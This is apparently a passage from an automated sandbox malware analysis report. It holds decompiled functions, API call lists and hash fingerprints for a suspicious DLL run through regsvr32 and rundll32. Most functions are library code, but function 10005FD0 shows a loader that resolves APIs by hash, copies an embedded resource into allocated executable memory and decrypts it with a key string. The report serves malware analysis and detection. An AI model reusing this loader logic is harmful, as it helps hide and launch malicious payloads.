							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x1003b800, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x1003b800, 0,  *0x1003b7ec, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x1003b7f8 =  *0x1003b7f8 + 0x10;
						 *0x1003b7ec = _t24;
						_t15 =  *0x1003b7e8; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x1001509a
0x1001509f
0x100150aa
0x100150e0
0x100150e0
0x100150f7
0x100150fa
0x10015102
0x10015105
0x10015118
0x10015120
0x10015123
0x10015137
0x1001513b
0x1001513d
0x10015140
0x10015149
0x1001514c
0x10015125
0x1001512f
0x00000000
0x1001512f
0x10015107
0x10015107
0x10015107
0x10015107
0x10015150
0x100150ac
0x100150ac
0x100150c1
0x100150c9
0x100150cf
0x100150d6
0x100150db
0x00000000
0x100150cb
0x100150ce
0x100150ce
0x100150c9

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,1001568B,00000000,?,00000000), ref: 100150C1
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,1001568B,00000000,?,00000000), ref: 100150FA
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10015118
HeapFree.KERNEL32(00000000,?), ref: 1001512F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 2064683716234f8dc8322d3380aa3720afb5cb0314e66d74085f078d5ed4a7ee
Instruction ID: fa0dbc0533eb2824c0d2254bc61f18d6a3d2f36dcd1bf0472acf9f081a6e9328
Opcode Fuzzy Hash: 2064683716234f8dc8322d3380aa3720afb5cb0314e66d74085f078d5ed4a7ee
Instruction Fuzzy Hash: D9110730204B25EFE322DF29CCC5A167BF5FB857A97204659E261CE1A1D771A886CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100286A3 Relevance: 5.0, APIs: 4, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100286A3(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1003a088 == 0) {
					E1002867F();
				}
				_t21 = _a4;
				_t24 = 0x10039e90 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x10039ed4);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x10039ef0 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x10039ed4);
				}
				_t13 = 0x10039ef0 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}

0x100286aa
0x100286ac
0x100286ac
0x100286ba
0x100286be
0x100286c8
0x100286d1
0x100286d6
0x100286e3
0x100286e9
0x100286e9
0x100286ec
0x100286f2
0x100286f6
0x100286fe
0x10028703

APIs

EnterCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286D1
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286E3
LeaveCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286EC
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772,1001E169), ref: 100286FE

Part of subcall function 1002867F: InitializeCriticalSection.KERNEL32(10039ED4,100286B1,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772,1001E169,10006E4C,?), ref: 10028697

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 072baf688489922e528998fa6537eca47b2b6c92223ef9da9c034ae0b78e5f30
Instruction ID: c7d326798cd6783a68320f0ac3dbdb1455df0cfd4a1851898cc364d0e411ca19
Opcode Fuzzy Hash: 072baf688489922e528998fa6537eca47b2b6c92223ef9da9c034ae0b78e5f30
Instruction Fuzzy Hash: 6CF0173540122EEFE701DB54ECC8A56B3ADFB5431AF91042AF54592412D738A5A6CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 6944, Parent PID: 6916COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	27.1%
Signature Coverage:	0%
Total number of Nodes:	310
Total number of Limit Nodes:	14

Executed Functions

Function 10018246 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10018246() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E100181F8); // executed
				 *0x1003a4b4 = _t1;
				return 0;
			}

0x1001824b
0x10018251
0x10018258

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000181F8), ref: 1001824B

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6ae9eadfa0a59b8e9e2620c716c6d0374d3f60cab3f6abc59e5b1e18cf53e332
Instruction ID: 19e5ef85f1c6b074eae053feec9fb52172a3ab49bbaf290e75bd22f8268f9ec3
Opcode Fuzzy Hash: 6ae9eadfa0a59b8e9e2620c716c6d0374d3f60cab3f6abc59e5b1e18cf53e332
Instruction Fuzzy Hash: 4CA022B28020308FE300CF308E8C0003AE8E3C83023000020EF82CE222EB38C2C28F20

Uniqueness

Uniqueness Score: -1.00%

Function 1001825A Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 1001825F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f553ca4d4bd98a52824076b3bd28ec37de5aeec962c6df0d5e0166ed401f7b3
Instruction ID: c091c4e1bf8fdb422519c3348aab80903a4b0aab302cbe51154732e15666b91e
Opcode Fuzzy Hash: 8f553ca4d4bd98a52824076b3bd28ec37de5aeec962c6df0d5e0166ed401f7b3
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10005FD0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 305
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E10005FD0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t55;
				void* _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				int _t83;
				intOrPtr _t94;
				signed int _t96;
				void* _t99;
				void* _t102;
				intOrPtr _t106;
				void* _t125;
				intOrPtr* _t127;
				int _t128;
				signed int _t130;
				long _t134;
				signed int _t136;
				signed int _t138;
				signed int _t144;
				void* _t151;
				void* _t152;
				struct HINSTANCE__* _t153;
				signed int _t154;
				void* _t157;
				void* _t161;
				void* _t162;
				struct HRSRC__* _t163;
				signed int _t164;
				void* _t165;
				signed int _t169;
				void* _t170;
				signed int _t172;
				signed int _t177;
				signed int _t184;
				void* _t190;
				void* _t194;
				void* _t195;
				intOrPtr _t200;

				if( *((intOrPtr*)(_t190 + 8)) != 1) {
					L6:
					return 1;
				} else {
					if(E10004850() != 0) {
						_push(0x1002b948);
						E100113E5(_t125, _t151, _t161, __eflags);
						__eflags = 0;
						return 0;
					} else {
						 *0x1003610c = 0;
						 *0x10036110 = 0;
						 *0x10036114 = 0;
						 *0x1003611c = 0;
						 *0x10036118 = 0;
						 *0x10036120 = 0;
						 *0x10036124 = 0;
						_t55 = E100011D0();
						_t162 = _t55;
						_t56 = E100011D0();
						_t152 = E100011D0();
						_t58 = E10001440();
						 *0x10038158 = _t58;
						_t59 = E10001440();
						 *0x10038150 = _t59;
						_t60 = E10001440();
						 *0x10038154 = _t60;
						_t61 = E10001440();
						 *0x1003814c = _t61;
						_t62 = E10001440();
						 *0x10038148 = _t62;
						_t63 = E10001440();
						 *0x10038144 = _t63;
						_t64 = E10001440();
						 *0x10038140 = _t64;
						_t65 = E10001440();
						 *0x10038198 = _t65;
						_t66 = E10001440();
						 *0x10038194 = _t66;
						_t67 = E10001440();
						 *0x10038190 = _t67;
						_t68 = E10001440();
						 *0x1003818c = _t68;
						_t69 = E10001440();
						 *0x10038188 = _t69;
						_t70 = E10001440();
						 *0x10038184 = _t70;
						_t71 = E10001440();
						 *0x10038180 = _t71;
						_t72 = E10001440();
						 *0x1003817c = _t72;
						_t73 = E10001440();
						_t194 = _t190 + 0xc8;
						 *0x10038178 = _t73;
						_t74 = E10001440();
						 *0x10038174 = _t74;
						_t75 = E10001440();
						 *0x10038170 = _t75;
						_t76 = E10001440();
						 *0x1003816c = _t76;
						_t77 = E10001440();
						 *0x10038168 = _t77;
						_t127 = E10001440();
						 *0x10038164 = _t127;
						_t79 = E10001440();
						 *0x10038160 = _t79;
						_t80 = E10001440();
						_t153 =  *(_t194 + 0x54);
						_t195 = _t194 + 0x38;
						 *0x1003815c = _t80;
						_t163 =  *_t127(_t153, 0x869f, 0x1002b96c, _t162, 0x1fec9b60, _t162, 0x745026d3, _t162, 0x3c929de2, _t162, 0xcd105606, _t162, 0x50054c9a, _t162, 0xc8d0ee0e, _t162, 0x51c62d76, _t56, 0x4f1b267e, _t162, 0xedcda0b5, _t162, 0x2f4bd8ff, _t162, 0x5d4ffe0a, _t162, 0x5a88c773, _t162, 0x2408370b, _t162, 0x84cccc02, _t162, 0x596365ef, _t162, 0x72b3cdac, _t152, 0x5eb174cb, _t152, 0x5f0970d0, _t152, 0x47a97482, _t152, 0xeb1a33a4, _t152, 0xd0ad2455, _t152, 0x5e4932f6, _t152, 0x5d0132fa, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82, 0xf4f8d3c5, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39, 0xeff9eb82, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2, 0xb0b0d9a7, _t151, _t161, _t170, _t125);
						 *((intOrPtr*)(_t195 + 0x1c)) = LoadResource(_t153, _t163);
						_t83 = SizeofResource(_t153, _t163);
						_t154 =  *0x1003610c; // 0x0
						_t128 = _t83;
						_t200 =  *0x10038194; // 0x76ec66e0
						if(_t200 == 0) {
							_t130 =  *0x10036114; // 0x0
							_t138 =  *0x10036118; // 0x0
							_t164 =  *0x10036120; // 0x0
							_t172 =  *0x10036110; // 0x0
							 *((intOrPtr*)(_t195 + 0x20)) = ((_t130 - _t138) * _t138 + _t164) * _t154 - _t172 + (((_t130 - _t138) * _t138 + _t164) * _t154 - _t172) * 2;
							_t94 = (_t164 + _t172 * 2 + (_t164 + _t172 * 2) * 2 - 9) *  *0x1003611c +  *((intOrPtr*)(_t195 + 0x20));
							_t33 = _t154 + 2; // 0x2
							 *((intOrPtr*)(_t195 + 0x20)) = _t154 + _t33;
							_t177 = _t164 * _t154 * 0x7fffffff;
							 *((intOrPtr*)(_t195 + 0x10)) = _t94;
							_t96 =  *0x10036110; // 0x0
							_t37 = _t177 + 0x7ffffffe; // 0x7ffffffe
							_t40 = _t154 * 2; // 0x80000ffe
							_t134 = ((_t130 - _t96) *  *(_t195 + 0x24) + (0x7fffffff - _t164) * 0x00000002) *  *0x1003611c + ((_t96 + _t37) * _t130 + _t40 + 0x00001000 + _t138 * 0x7fffffff) * 0x00000002 |  *(_t195 + 0x14) + 0x00001000;
							__eflags = _t134;
							_t99 = VirtualAlloc(0, _t128, _t134, _t94 + 0x40);
						} else {
							_t136 =  *0x10036110; // 0x0
							_t144 =  *0x10036114; // 0x0
							_t4 = _t144 + 1; // 0x1
							_t169 =  *0x10036120; // 0x0
							_t6 = _t136 * 2; // 0x6
							_t184 =  *0x10036118; // 0x0
							_t22 = ((_t144 + 1) * _t154 - _t169 + 0x7fffffff) * _t136 + (_t154 + 0x7fffffff) * _t169 + 0x2000; // -2147475454
							_t99 =  *0x10038194(0xffffffff, 0, _t128, ((_t144 - _t184) * _t184 + _t169) * _t154 + ((_t144 - _t184) * _t184 + _t169) * _t154 * 0x00000002 + (_t169 + _t136 * 0x00000002 + (_t169 + _t136 * 0x00000002) * 0x00000002 - 0x00000009) *  *0x1003611c - _t136 + _t136 * 0x00000002 + 0x00001000 | ((_t144 + 0x00000001) * _t154 - _t169 + 0x7fffffff) * _t136 + (_t154 + 0x7fffffff) * _t169 + _t22, (1 - _t154) * _t136 + _t4 *  *0x1003611c + 2 - (_t136 + _t6 + 6) * _t169 - _t144 + _t144 * 2 + 0x40, 0); // executed
						}
						_t165 = _t99;
						memcpy(_t165,  *(_t195 + 0x14), _t128);
						_t102 = malloc(0xf04); // executed
						_t157 = _t102;
						E10001820();
						E100020F0();
						 *0x10038154(_t157, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t157, _t165, _t128, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t157, "NF*0%*F&PYU5D%V9U95IUUEULekAEq3Pu5RqsL?trX3nqllo^cOx4B+9FZlBRW1nyLkdCsMgQU7I>?QhmoVV8+FY)cGeoWD7iQWK5P", 0x67);
						_t106 = E10004BB0();
						 *0x100381a0 = _t106;
						 *0x1003819c( *((intOrPtr*)(_t195 + 0x80)), 1, 0, _t165, _t128, E10003EB0, E10003ED0, E10003EF0, E10003F50, E10003F70, 0);
						goto L6;
					}
				}
			}

APIs

LoadResource.KERNEL32(?,00000000), ref: 1000621E
SizeofResource.KERNEL32(?,00000000), ref: 1000622A
VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,-00001000,-0000003F,00000000), ref: 100062DB
VirtualAlloc.KERNEL32(00000000,00000000,?,?), ref: 1000638B
memcpy.MSVCRT ref: 1000639A
malloc.MSVCRT ref: 100063A5
??3@YAXPAX@Z.MSVCRT ref: 100063E4

Strings

NF*0%*F&PYU5D%V9U95IUUEULekAEq3Pu5RqsL?trX3nqllo^cOx4B+9FZlBRW1nyLkdCsMgQU7I>?QhmoVV8+FY)cGeoWD7iQWK5P, xrefs: 100063AD
`gv, xrefs: 10006151

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocResourceVirtual$??3@LoadNumaSizeofmallocmemcpy
String ID: NF*0%*F&PYU5D%V9U95IUUEULekAEq3Pu5RqsL?trX3nqllo^cOx4B+9FZlBRW1nyLkdCsMgQU7I>?QhmoVV8+FY)cGeoWD7iQWK5P$`gv
API String ID: 1108135221-4266834519
Opcode ID: 709cbee12aeba38ee5f55d833185045112468640c15698cf672df178b0078bb3
Instruction ID: b041f92eca5ba3fdc6980204e7f93ec9d4e673b14fddfdf5e513b5c7e773d603
Opcode Fuzzy Hash: 709cbee12aeba38ee5f55d833185045112468640c15698cf672df178b0078bb3
Instruction Fuzzy Hash: 4BB13A71900325AFF701DF75CD86E967BACEB4A384B04851AF600EB277EB70B6118B95

Uniqueness

Uniqueness Score: -1.00%

Function 100281D9 Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E100281D9(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t41;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				void* _t48;
				void* _t49;
				signed int _t70;
				signed char* _t72;
				signed int _t81;
				signed char* _t84;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_t72 = __ecx;
				_t88 = _t93;
				_push(__ecx);
				_push(__ecx);
				_t84 = __ecx;
				_t1 = _t84 + 0x1c; // 0x10039e60
				_t41 = _t1;
				_v8 = _t41;
				EnterCriticalSection(_t41);
				_t3 = _t84 + 4; // 0x20
				_t42 =  *_t3;
				_t4 = _t84 + 8; // 0x3
				if( *_t4 >= _t42) {
					L5:
					_t81 = 1;
					if(_t42 <= 1) {
						L10:
						_t19 = _t42 + 0x20; // 0x40
						_t70 = _t19;
						_t20 = _t84 + 0x10; // 0xb32490
						_t43 =  *_t20;
						if(_t43 != 0) {
							_t44 = GlobalHandle(_t43);
							_v12 = _t44;
							GlobalUnlock(_t44);
							_t48 = GlobalReAlloc(_v12, _t70 << 3, 0x2002);
						} else {
							_t48 = GlobalAlloc(2, _t70 << 3); // executed
						}
						if(_t48 != 0) {
							_t49 = GlobalLock(_t48);
							_t25 = _t84 + 4; // 0x20
							_v12 = _t49;
							E10012400(_t49 +  *_t25 * 8, 0, _t70 -  *_t25 << 3);
							 *(_t84 + 4) = _t70;
							 *(_t84 + 0x10) = _v12;
							goto L18;
						} else {
							_t23 = _t84 + 0x10; // 0xb32490
							_t86 =  *_t23;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v8);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v32 = 0x10039c78;
							E100125AC( &_v32, 0x10032648);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v40 = 0x10039d10;
							E100125AC( &_v40, 0x1003268c);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v48 = 0x10039da8;
							E100125AC( &_v48, 0x100326d0);
							asm("int3");
							return 0x1002e140;
						}
					} else {
						_t16 = _t84 + 0x10; // 0xb32490
						_t72 =  *_t16 + 8;
						while(( *_t72 & 0x00000001) != 0) {
							_t81 = _t81 + 1;
							_t72 =  &(_t72[8]);
							if(_t81 < _t42) {
								continue;
							}
							break;
						}
						if(_t81 < _t42) {
							goto L18;
						} else {
							goto L10;
						}
					}
				} else {
					_t11 = __esi + 0x10; // 0xb32490
					__ecx =  *_t11;
					if(( *( *_t11 + __edi * 8) & 0x00000001) == 0) {
						L18:
						_t32 = _t84 + 0xc; // 0x3
						if(_t81 >=  *_t32) {
							_t33 = _t81 + 1; // 0x4
							 *((intOrPtr*)(_t84 + 0xc)) = _t33;
						}
						_t35 = _t84 + 0x10; // 0xb32490
						 *( *_t35 + _t81 * 8) =  *( *_t35 + _t81 * 8) | 0x00000001;
						_t39 = _t81 + 1; // 0x4
						 *((intOrPtr*)(_t84 + 8)) = _t39;
						LeaveCriticalSection(_v8);
						return _t81;
					} else {
						goto L5;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(10039E60,00000000,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C), ref: 100281EA
GlobalAlloc.KERNEL32(00000002,00000040,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C), ref: 1002823B
GlobalHandle.KERNEL32(00B32490), ref: 10028244
GlobalUnlock.KERNEL32(00000000,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C,?), ref: 1002824E
GlobalReAlloc.KERNEL32 ref: 10028262
GlobalHandle.KERNEL32(00B32490), ref: 10028274
GlobalLock.KERNEL32 ref: 1002827B
LeaveCriticalSection.KERNEL32(?,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C,?), ref: 10028284
GlobalLock.KERNEL32 ref: 10028290
LeaveCriticalSection.KERNEL32(?), ref: 100282D8

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 5d27eb62a9a16ca5e94be886ee61e449629fb40b692c20ca73c00637330e3a18
Instruction ID: dbd813a6aa0f8bf5c178e234d1f0cd89eb832e94261be678814499acfecdaa95
Opcode Fuzzy Hash: 5d27eb62a9a16ca5e94be886ee61e449629fb40b692c20ca73c00637330e3a18
Instruction Fuzzy Hash: 22318974A01B15EFD720CFA4DC88A5ABBF9FB44344B518929E856D3660D730FA4ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 10016734 Relevance: 7.7, APIs: 5, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E10016734() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E10011233(0x480);
				if(_t51 != 0) {
					 *0x1003a6c0 = _t51;
					 *0x1003a6ac = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1003a6c0; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1003a6c0; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99); // executed
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019F98(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1003a6ac);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1003a6ac - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1003a6c0[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019F98(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1003a6c4;
						while(1) {
							_t78 = E10011233(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1003a6ac =  *0x1003a6ac + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1003a6ac - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
